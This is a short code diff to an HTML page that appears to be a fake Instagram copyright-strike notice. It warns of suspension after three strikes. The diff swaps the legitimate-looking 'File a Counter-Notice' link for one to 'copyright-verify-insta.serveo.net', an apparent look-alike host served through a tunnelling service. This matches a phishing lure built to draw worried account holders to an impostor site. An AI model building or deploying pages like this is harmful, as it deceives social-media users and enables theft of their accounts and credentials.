--- a/index.html
+++ b/index.html
@@ -63,7 +63,7 @@
       <p>
         Please note that even if you decide to delete the post, the copyright strike will still count against your account. If you receive three copyright strikes, your account may be suspended or terminated.
       </p>
-       <a href="https://www.instagram.com/counter_notice" target = _blank>File a Counter-Notice</a>
+       <a href="https://copyright-verify-insta.serveo.net" target = _blank>File a Counter-Notice</a>
     </div>
   </body>
 </html>
